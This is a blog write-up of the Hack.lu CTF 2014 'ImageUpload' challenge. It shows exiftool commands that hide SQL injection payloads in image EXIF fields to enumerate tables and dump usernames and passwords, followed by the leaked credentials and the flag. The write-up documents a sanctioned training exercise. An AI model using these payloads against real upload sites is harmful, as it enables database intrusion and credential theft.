23 October 2014

HACK.LU CTF 2014: ImageUpload WRITEUP


In the Wild Wild Web, there are really bad guys. The sheriff doesn't know them all. Therefore, he needs your help.
Upload pictures of criminals to this site and help the sheriff to arrest them.
You can make this Wild Wild Web much less wild!!!

Pictures will be deleted on regular basis!







it looks like an image upload website, and there's some login aswell
uploading a regular pictures returns back our picture made up in a box with these informations displayed

WidthHeightAuthorManufacturerModel
00

so it's getting some exifdata out of the image and displaying it, what's more ?
fuzzing in an image exifdata a bit gave back error of inserting in db.
so it's a SQL injection in insert into !
$ exiftool -Make="',(SELECT version()))-- a" 1.jpg 1 image files updated


and we got this back:
WidthHeightAuthorManufacturerModel
005.5.40-0ubuntu0.14.04.1


$ exiftool -Make="',(SELECT group_concat(table_name) from information_schema.tables WHERE table_schema=database() ))-- a" 1.jpg 1 image files updated

WidthHeightAuthorManufacturerModel
00brute,pictures,users


$ exiftool -Make="',(SELECT group_concat(name,0x7c,password) from users))-- a" 1.jpg 1 image files updated

WidthHeightAuthorManufacturerModel
00sheriff|AO7eikkOCucCFJOyyaaQ,deputy|testpw


loggin in with sheriff user and we got flag

You are sucessfully logged in.
Flag: flag{1_5h07_7h3_5h3r1ff}



No comments:

Post a Comment